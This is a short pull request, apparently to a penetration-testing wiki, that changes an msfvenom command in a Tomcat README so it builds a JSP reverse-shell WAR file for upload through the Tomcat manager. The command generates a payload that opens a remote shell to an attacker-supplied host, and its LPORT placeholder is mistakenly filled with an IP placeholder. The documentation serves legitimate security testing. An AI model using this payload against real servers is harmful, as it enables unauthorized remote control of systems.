### PR TITLE
Update README.md to use java/jsp_shell_reverse_tcp for Tomcat TCP reverse shell war file generation

### DIFF
--- a/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/network-services-pentesting/pentesting-web/tomcat/README.md
@@ -161,7 +161,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
 1. Create the war to deploy:
 
 ```bash
-msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
 ```
 
 2. Upload the `revshell.war` file and access to it (`/revshell/`):


### PR DESCRIPTION
Use correct Metasploit payload for Tomcat TCP reverse shell war generation.


